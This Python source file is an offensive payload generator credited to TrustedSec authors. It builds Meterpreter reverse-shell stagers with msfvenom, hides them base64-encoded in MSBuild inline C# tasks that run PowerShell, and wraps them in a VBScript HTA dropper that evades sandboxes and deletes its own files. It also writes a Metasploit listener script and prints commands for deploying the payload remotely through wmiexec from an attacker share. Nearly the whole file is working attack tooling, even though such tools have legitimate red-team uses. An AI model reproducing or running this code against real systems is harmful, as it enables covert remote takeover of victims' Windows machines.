  1. #!/usr/bin/env python
  2.  
  3. # Written by Larry Spohn (@Spoonman1091)
  4. # Payload written by Ben Mauch (@Ben0xA) aka dirty_ben
  5. # TrustedSec, LLC
  6. # https://www.trustedsec.com
  7.  
from __future__ import print_function

import base64
import os
import subprocess
import sys

import netifaces as nic
import pexpect
  14.  
class bcolors:
    """ANSI SGR escape sequences used to colour console output.

    Each attribute is a plain str prefix (ESC, byte 0x1b, then the SGR code);
    print one before the text and ENDC after it to reset terminal attributes.
    """
    BLUE = "\x1b[94m"
    GREEN = "\x1b[92m"
    WARNING = "\x1b[93m"
    WHITE = "\x1b[97m"
    ERROR = "\x1b[91m"
    ENDC = "\x1b[0m"
    BOLD = "\x1b[1m"
    UNDERLINE = "\x1b[4m"
  24.  
# Listener address handed to msfvenom (LHOST) and to the multi/handler stanza.
# "127.0.0.1" doubles as the "not chosen yet" sentinel that
# generate_msfvenom_payload() checks before prompting.
listener_ip = "127.0.0.1"

# Interface whose IPv4 address is offered as the default listener address.
local_interface = "ens33"

# Python 2/3 shim: Python 3 dropped the raw_input() builtin, and its input()
# already returns the typed text as a plain str, so alias it there.
if sys.version_info[0] >= 3:
    raw_input = input
  34.  
  35. # Enumerate the local IP assigned to "iface"
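def get_local_ip(iface):
    """Return the first IPv4 address assigned to *iface*, or None.

    netifaces.AF_INET is the named form of the bare index 2 the original used.
    Failure (unknown interface, or an interface with no IPv4 address) yields
    None rather than an exception so callers can fall back to prompting; the
    original's bare ``except:`` also hid genuine programming errors such as
    NameError, which now propagate.
    """
    try:
        addrs = nic.ifaddresses(iface)
    except ValueError:
        # netifaces raises ValueError for an interface name it does not know
        return None
    try:
        return addrs[nic.AF_INET][0]["addr"]
    except (KeyError, IndexError):
        # interface exists but carries no IPv4 address
        return None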
  43.  
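def generate_msfvenom_payload(msf_payload):
    """Run msfvenom to write msf_payload.ps1 for *msf_payload* and append the
    matching multi/handler stanza to msbuild_nps.rc.

    Prompts once per run for the listener address (default: the IPv4 address
    of ``local_interface``) and for the listener port, re-asking until the
    port is a valid TCP port.  Updates the module-level ``listener_ip``.
    Returns True when msfvenom exited 0, False otherwise; failures are printed
    rather than raised so the interactive menu keeps working.
    """
    global listener_ip

    # "127.0.0.1" is the module's "not chosen yet" sentinel, so the address
    # prompt is shown only for the first payload of a run.
    if listener_ip == "127.0.0.1":
        local_ip = get_local_ip(local_interface)
        while True:
            entered = raw_input("Enter Your Local IP Address (%s): " % local_ip).strip()
            chosen = entered or local_ip
            if chosen:
                break
            # interface lookup found nothing and the user typed nothing
            print(bcolors.ERROR + "[!]" + bcolors.ENDC + " A listener address is required.")
        listener_ip = chosen

    # LPORT goes verbatim into the msfvenom command line and the resource
    # script, so reject anything that is not a real port number.
    while True:
        entered = raw_input("Enter the listener port (443): ").strip() or "443"
        try:
            msf_port = int(entered)
        except ValueError:
            msf_port = 0
        if 1 <= msf_port <= 65535:
            break
        print(bcolors.ERROR + "[!]" + bcolors.ENDC + " Invalid port: %r" % entered)

    print(bcolors.BLUE + "[*]" + bcolors.ENDC + " Generating PSH Payload...")
    # Argument list, no shell: user-supplied LHOST/LPORT can never be split
    # into extra arguments or interpreted as shell syntax, and the exit status
    # is checked instead of being discarded with the captured output.
    cmd = [
        "msfvenom", "-p", msf_payload,
        "LHOST=%s" % listener_ip, "LPORT=%d" % msf_port,
        "--arch", "x86", "--platform", "win",
        "-f", "psh", "-o", "msf_payload.ps1",
    ]
    try:
        rc = subprocess.call(cmd)
    except OSError as exc:  # e.g. msfvenom not on PATH
        print(bcolors.ERROR + "[!]" + bcolors.ENDC + " Could not run msfvenom: %s" % exc)
        return False
    if rc != 0:
        print(bcolors.ERROR + "[!]" + bcolors.ENDC
              + " msfvenom exited with status %d; msf_payload.ps1 was not generated." % rc)
        return False

    print(bcolors.BLUE + "[*]" + bcolors.ENDC + " Generating MSF Resource Script...")
    payload_listener = (
        "\nset payload %s\nset LHOST %s\nset LPORT %s\n"
        "set ExitOnSession false\nset EnableStageEncoding true\nexploit -j -z"
        % (msf_payload, listener_ip, msf_port)
    )
    with open("msbuild_nps.rc", "a") as msf_resource_file:
        msf_resource_file.write(payload_listener)
    return True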
  64.  
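def encode_pshpayload(payload_file):
    """Read the PowerShell script at *payload_file*, append a keep-alive loop
    and return the whole thing base64-encoded as a text str.

    The appended ``for (;;){ Start-sleep 60 }`` keeps the hosting process (and
    its PowerShell runspace) alive after the script body has run.  The result
    is also stored in the module-level ``psh_payload`` because the generator
    functions read it from there.  Raises IOError/OSError if the file cannot
    be read.
    """
    global psh_payload

    with open(payload_file, "r") as psh_file:
        script = psh_file.read()
    script += "for (;;){\n Start-sleep 60\n}"

    # .decode(): on Python 3 b64encode() returns bytes, and formatting bytes
    # with %s would embed "b'...'" in the generated XML/HTA, which the C#
    # Base64Decode() then rejects.  base64 output is pure ASCII.
    psh_payload = base64.b64encode(script.encode("utf-8")).decode("ascii")
    return psh_payload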
  73.  
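# MSBuild project consumed by msbuild.exe: the inline C# task base64-decodes
# the embedded PowerShell script and runs it in an in-process runspace.  The
# single %s is the only format placeholder; the rest is emitted verbatim.
_MSBUILD_NPS_XML = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\\v4.0.30319\msbuild.exe nps.xml -->
<!-- Original MSBuild Author: Casey Smith, Twitter: @subTee -->
<!-- NPS Created By: Ben Ten, Twitter: @ben0xa -->
<!-- License: BSD 3-Clause -->
<Target Name="npscsharp">
<nps />
</Target>
<UsingTask
TaskName="nps"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class nps : Task, ITask
{
public override bool Execute()
{
string cmd = "%s";
PowerShell ps = PowerShell.Create();
ps.AddScript(Base64Decode(cmd));
Collection<PSObject> output = null;
try
{
output = ps.Invoke();
}
catch(Exception e)
{
Console.WriteLine("Error while executing the script.\\r\\n" + e.Message.ToString());
}
if (output != null)
{
foreach (PSObject rtnItem in output)
{
Console.WriteLine(rtnItem.ToString());
}
}
return true;
}
public static string Base64Encode(string text) {
return System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(text));
}
public static string Base64Decode(string encodedtext) {
return System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(encodedtext));
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>"""


def generate_msbuild_nps_msf_payload():
    """Interactively build msbuild_nps.xml and its Metasploit resource script.

    Recreates msbuild_nps.rc with a multi/handler stanza, asks for one payload
    (a Meterpreter stager produced by generate_msfvenom_payload(), or a
    user-supplied .ps1), base64-encodes it with encode_pshpayload() and writes
    it into the MSBuild inline-task template.  Prints deployment hints and
    exits the process with status 0 when done.
    """
    global psh_payload

    # Start from a clean resource script; generate_msfvenom_payload() appends
    # the per-payload handler options to it.
    if os.path.exists("msbuild_nps.rc"):
        os.remove("msbuild_nps.rc")
    with open("msbuild_nps.rc", "a") as msf_resource_file:
        msf_resource_file.write("use multi/handler")

    options = {
        1: "windows/meterpreter/reverse_tcp",
        2: "windows/meterpreter/reverse_http",
        3: "windows/meterpreter/reverse_https",
        4: "custom_ps1_payload",
    }

    # Loop until a payload has actually been encoded.  raw_input() + int()
    # replaces the original input(): on Python 2 that eval()ed whatever was
    # typed at the prompt, and on Python 3 it returned a str that never matched
    # the int keys, so options.get() was None and msfvenom ran with "-p None".
    while True:
        print("\nPayload Selection:")
        print("\n\t(1)\twindows/meterpreter/reverse_tcp")
        print("\t(2)\twindows/meterpreter/reverse_http")
        print("\t(3)\twindows/meterpreter/reverse_https")
        print("\t(4)\tCustom PS1 Payload")

        choice = raw_input("\nSelect payload: ").strip()
        try:
            selection = options[int(choice)]
        except (ValueError, KeyError):
            print(bcolors.ERROR + "[!]" + bcolors.ENDC + " Invalid selection: %r" % choice)
            continue

        if selection == "custom_ps1_payload":
            custom_ps1 = raw_input("Enter the location of your custom PS1 file: ").strip()
            if not os.path.isfile(custom_ps1):
                print(bcolors.ERROR + "[!]" + bcolors.ENDC + " No such file: %s" % custom_ps1)
                continue
            psh_payload = encode_pshpayload(custom_ps1)
        else:
            # Drop any stale artifact first so a failed msfvenom run cannot be
            # mistaken for a freshly generated payload.
            if os.path.exists("msf_payload.ps1"):
                os.remove("msf_payload.ps1")
            generate_msfvenom_payload(selection)
            if not os.path.isfile("msf_payload.ps1"):
                print(bcolors.ERROR + "[!]" + bcolors.ENDC
                      + " msfvenom did not produce msf_payload.ps1; nothing to embed.")
                continue
            psh_payload = encode_pshpayload("msf_payload.ps1")
        break

    # b64encode() returns bytes on Python 3; formatting bytes with %s would
    # embed "b'...'" in the XML, which the C# Base64Decode() rejects.
    if isinstance(psh_payload, bytes):
        psh_payload = psh_payload.decode("ascii")

    with open("msbuild_nps.xml", "w") as msbuild_nps_file:
        msbuild_nps_file.write(_MSBUILD_NPS_XML % psh_payload)

    print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Metasploit resource script written to msbuild_nps.rc")
    print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Payload written to msbuild_nps.xml")
    print("\n1. Run \"" + bcolors.WHITE + "msfconsole -r msbuild_nps.rc" + bcolors.ENDC + "\" to start listener.")
    print("2. Choose a Deployment Option (a or b): - See README.md for more information.")
    print(" a. Local File Deployment:\n" + bcolors.WHITE + " - %windir%\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe <folder_path_here>\\msbuild_nps.xml" + bcolors.ENDC)
    print(" b. Remote File Deployment:\n" + bcolors.WHITE + " - wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe \\\\<attackerip>\\<share>\\msbuild_nps.xml" + bcolors.ENDC)
    print("3. Hack the Planet!!")

    sys.exit(0)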
  186.  
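# HTA wrapper: the VBScript writes one MSBuild project per payload into %TEMP%,
# launches msbuild.exe on each, then deletes the files.  Only %s (the VBScript
# Array() contents) is a format placeholder; every %% is a literal percent
# sign for the environment-variable references.
_MSBUILD_NPS_HTA = """<script language=vbscript>
On Error Resume Next
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objShell = CreateObject("WScript.Shell")
objTemp = objShell.ExpandEnvironmentStrings("%%TEMP%%")
objWindir = objShell.ExpandEnvironmentStrings("%%windir%%")
Set objWMIService = GetObject("winmgmts:\\\\.\\root\CIMV2")
arrUnicorns = Array(%s)
' Get logical processor count
Set colComputerSystem = objWMIService.ExecQuery("SELECT * FROM Win32_ComputerSystem")
For Each objComputerSystem In colComputerSystem
objProcessorCount = objComputerSystem.NumberofLogicalProcessors
Next
' Only run if system has more than 1 processor
' https://www.trustedsec.com/may-2015/bypassing-virtualization-and-sandbox-technologies/
If objProcessorCount > 1 Then
' Sleep 60 seconds
' https://www.sans.org/reading-room/whitepapers/malicious/sleeping-sandbox-35797
objShell.Run "%%COMSPEC%% /c ping -n 60 127.0.0.1>nul", 0, 1
For Each objUnicorn in arrUnicorns
x = x + 1
' Create MSBuild XML File
CreateMSBuildXML objUnicorn, x
' Execute resource(x).xml using msbuild.exe and nps
objShell.Run objWindir & "\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe %%TEMP%%\\resource" & x & ".xml", 0
Next
' Cleanup
For y = 1 To x
Do While objFSO.FileExists(objTemp & "\\resource" & y & ".xml")
objShell.Run "%%COMSPEC%% /c ping -n 10 127.0.0.1>nul", 0, 1
objFSO.DeleteFile(objTemp & "\\resource" & y & ".xml")
Loop
Next
End If
window.close()
' Creates XML configuration files in the %%TEMP%% directory
Function CreateMSBuildXML(objUnicorn, x)
msbuildXML = "<Project ToolsVersion=" & CHR(34) & "4.0" & CHR(34) & " xmlns=" & CHR(34) & "http://schemas.microsoft.com/developer/msbuild/2003" & CHR(34) & ">" & vbCrLf &_
" <!-- This inline task executes c# code. -->" & vbCrLf &_
" <!-- C:\Windows\Microsoft.NET\Framework64\\v4.0.30319\msbuild.exe nps.xml -->" & vbCrLf &_
" <!-- Original MSBuild Author: Casey Smith, Twitter: @subTee -->" & vbCrLf &_
" <!-- NPS Created By: Ben Ten, Twitter: @ben0xa -->" & vbCrLf &_
" <!-- License: BSD 3-Clause -->" & vbCrLf &_
" <Target Name=" & CHR(34) & "npscsharp" & CHR(34) & ">" & vbCrLf &_
" <nps />" & vbCrLf &_
" </Target>" & vbCrLf &_
" <UsingTask" & vbCrLf &_
" TaskName=" & CHR(34) & "nps" & CHR(34) & "" & vbCrLf &_
" TaskFactory=" & CHR(34) & "CodeTaskFactory" & CHR(34) & "" & vbCrLf &_
" AssemblyFile=" & CHR(34) & "C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" & CHR(34) & " >" & vbCrLf &_
" <Task>" & vbCrLf &_
" <Reference Include=" & CHR(34) & "System.Management.Automation" & CHR(34) & " />" & vbCrLf &_
" <Code Type=" & CHR(34) & "Class" & CHR(34) & " Language=" & CHR(34) & "cs" & CHR(34) & ">" & vbCrLf &_
" <![CDATA[" & vbCrLf &_
"" & vbCrLf &_
" using System;" & vbCrLf &_
" using System.Collections.ObjectModel;" & vbCrLf &_
" using System.Management.Automation;" & vbCrLf &_
" using System.Management.Automation.Runspaces;" & vbCrLf &_
" using Microsoft.Build.Framework;" & vbCrLf &_
" using Microsoft.Build.Utilities;" & vbCrLf &_
"" & vbCrLf &_
" public class nps : Task, ITask" & vbCrLf &_
" {" & vbCrLf &_
" public override bool Execute()" & vbCrLf &_
" {" & vbCrLf &_
" string cmd = " & CHR(34) & objUnicorn & CHR(34) & ";" & vbCrLf &_
" " & vbCrLf &_
" PowerShell ps = PowerShell.Create();" & vbCrLf &_
" ps.AddScript(Base64Decode(cmd));" & vbCrLf &_
"" & vbCrLf &_
" Collection<PSObject> output = null;" & vbCrLf &_
" try" & vbCrLf &_
" {" & vbCrLf &_
" output = ps.Invoke();" & vbCrLf &_
" }" & vbCrLf &_
" catch(Exception e)" & vbCrLf &_
" {" & vbCrLf &_
" Console.WriteLine(" & CHR(34) & "Error while executing the script.\\r\\n" & CHR(34) & " + e.Message.ToString());" & vbCrLf &_
" }" & vbCrLf &_
" if (output != null)" & vbCrLf &_
" {" & vbCrLf &_
" foreach (PSObject rtnItem in output)" & vbCrLf &_
" {" & vbCrLf &_
" Console.WriteLine(rtnItem.ToString());" & vbCrLf &_
" }" & vbCrLf &_
" }" & vbCrLf &_
" return true;" & vbCrLf &_
" }" & vbCrLf &_
"" & vbCrLf &_
" public static string Base64Encode(string text) {" & vbCrLf &_
" return System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(text));" & vbCrLf &_
" }" & vbCrLf &_
"" & vbCrLf &_
" public static string Base64Decode(string encodedtext) {" & vbCrLf &_
" return System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(encodedtext));" & vbCrLf &_
" }" & vbCrLf &_
" }" & vbCrLf &_
" ]]>" & vbCrLf &_
" </Code>" & vbCrLf &_
" </Task>" & vbCrLf &_
" </UsingTask>" & vbCrLf &_
"</Project>"
Set objFile = objFSO.CreateTextFile(objTemp & "\\resource" & x & ".xml", True)
objFile.WriteLine(msbuildXML)
objFile.Close
End Function
</script>"""


def generate_msbuild_nps_msf_hta_payload():
    """Interactively build msbuild_nps.hta carrying one or more payloads, plus
    the matching Metasploit resource script.

    Recreates msbuild_nps.rc with a multi/handler stanza, then repeats the
    payload menu until the user enters 99; each chosen payload (msfvenom
    stager or custom .ps1) is base64-encoded and collected.  The encoded
    strings are written into the HTA template as a VBScript Array() literal.
    Prints deployment hints and exits the process with status 0 when done.
    """
    global psh_payload

    psh_payload = ""
    encoded_payloads = []

    # Start from a clean resource script; generate_msfvenom_payload() appends
    # the per-payload handler options to it.
    if os.path.exists("msbuild_nps.rc"):
        os.remove("msbuild_nps.rc")
    with open("msbuild_nps.rc", "a") as msf_resource_file:
        msf_resource_file.write("use multi/handler")

    options = {
        1: "windows/meterpreter/reverse_tcp",
        2: "windows/meterpreter/reverse_http",
        3: "windows/meterpreter/reverse_https",
        4: "custom_ps1_payload",
        99: "finished",
    }

    # raw_input() + int() replaces the original input(): on Python 2 that
    # eval()ed whatever was typed at the prompt, and on Python 3 it returned a
    # str that never matched the int keys (so 99 could not even end the loop).
    while True:
        print("\nPayload Selection:")
        print("\n\t(1)\twindows/meterpreter/reverse_tcp")
        print("\t(2)\twindows/meterpreter/reverse_http")
        print("\t(3)\twindows/meterpreter/reverse_https")
        print("\t(4)\tCustom PS1 Payload")
        print("\t(99)\tFinished")

        choice = raw_input("\nSelect multiple payloads. Enter 99 when finished: ").strip()
        try:
            selection = options[int(choice)]
        except (ValueError, KeyError):
            print(bcolors.ERROR + "[!]" + bcolors.ENDC + " Invalid selection: %r" % choice)
            continue

        if selection == "finished":
            break
        elif selection == "custom_ps1_payload":
            custom_ps1 = raw_input("Enter the location of your custom PS1 file: ").strip()
            if not os.path.isfile(custom_ps1):
                print(bcolors.ERROR + "[!]" + bcolors.ENDC + " No such file: %s" % custom_ps1)
                continue
            psh_payload = encode_pshpayload(custom_ps1)
        else:
            # Drop any stale artifact first so a failed msfvenom run cannot be
            # mistaken for a freshly generated payload.
            if os.path.exists("msf_payload.ps1"):
                os.remove("msf_payload.ps1")
            generate_msfvenom_payload(selection)
            if not os.path.isfile("msf_payload.ps1"):
                print(bcolors.ERROR + "[!]" + bcolors.ENDC
                      + " msfvenom did not produce msf_payload.ps1; nothing to embed.")
                continue
            psh_payload = encode_pshpayload("msf_payload.ps1")
            os.remove("msf_payload.ps1")

        # b64encode() returns bytes on Python 3; concatenating bytes into the
        # VBScript literal would embed "b'...'" and break Base64Decode().
        if isinstance(psh_payload, bytes):
            psh_payload = psh_payload.decode("ascii")
        encoded_payloads.append(psh_payload)

    if not encoded_payloads:
        print(bcolors.WARNING + "[!]" + bcolors.ENDC
              + " No payloads selected; the HTA will contain an empty Array().")

    # VBScript array literal: one quoted base64 string per payload, joined with
    # the "_" line continuation exactly as the original string-building loop did.
    psh_payloads = ", _\n\t".join('"%s"' % p for p in encoded_payloads)

    with open("msbuild_nps.hta", "w") as msbuild_nps_file:
        msbuild_nps_file.write(_MSBUILD_NPS_HTA % psh_payloads)

    print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Metasploit resource script written to msbuild_nps.rc")
    print(bcolors.GREEN + "[+]" + bcolors.ENDC + " Payload written to msbuild_nps.hta")
    print("\n1. Run \"" + bcolors.WHITE + "msfconsole -r msbuild_nps.rc" + bcolors.ENDC + "\" to start listener.")
    print("2. Deploy hta file to web server and navigate from the victim machine.")
    print("3. Hack the Planet!!")

    sys.exit(0)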
  362.  
  363. # Exit Program
def quit():
    """Terminate the program with exit status 0 (menu option 99).

    Deliberately shadows the builtin quit(): main() dispatches to this name.
    SystemExit is what sys.exit() raises, so callers see identical behaviour.
    """
    raise SystemExit(0)
  366.  
  367.  
  368. # Main guts
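def main():
    """Print the banner and loop over the top-level task menu.

    Each numbered task is a generator function that exits the process itself
    (or quit() for 99), so the loop only repeats on an invalid selection.
    """
    # NOTE(review): the banner's internal whitespace was lost in this paste;
    # restore the art from the upstream repository.  Raw string: the art is
    # full of backslashes, none of which are meant as escape sequences.
    print(r"""
( (
) ( )\ ) )\ )
( ` ) ( ` ) ( /( )\ )((_)( ( /( (()/(
)\ ) /(/( )\ /(/( )(_)|()/( _ )\ )(_)) ((_)
_(_/(((_)_\((_) ((_)_\((_)_ )(_)) |((_)((_)_ _| |
| ' \)) '_ \|_-< | '_ \) _` | || | / _ \/ _` / _` |
|_||_|| .__//__/____| .__/\__,_|\_, |_\___/\__,_\__,_|
|_| |_____|_| |__/
v1.03
""")

    options = {
        1: generate_msbuild_nps_msf_payload,
        2: generate_msbuild_nps_msf_hta_payload,
        99: quit,
    }

    while True:
        print("\n\t(1)\tGenerate msbuild/nps/msf payload")
        print("\t(2)\tGenerate msbuild/nps/msf HTA payload")
        print("\t(99)\tQuit")

        # raw_input() + int() replaces the original input(): on Python 2 that
        # eval()ed whatever was typed at the prompt, and on Python 3 it returned
        # a str that never matched the int keys, so every choice was silently
        # swallowed by the KeyError handler and the menu looped forever.
        choice = raw_input("\nSelect a task: ").strip()
        try:
            task = options[int(choice)]
        except (ValueError, KeyError):
            print(bcolors.ERROR + "[!]" + bcolors.ENDC + " Invalid selection: %r" % choice)
            continue
        task()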
  397.  
  398.  
  399. # Standard boilerplate to call the main() function
if __name__ == "__main__":  # run the menu only when executed as a script, not on import
    main()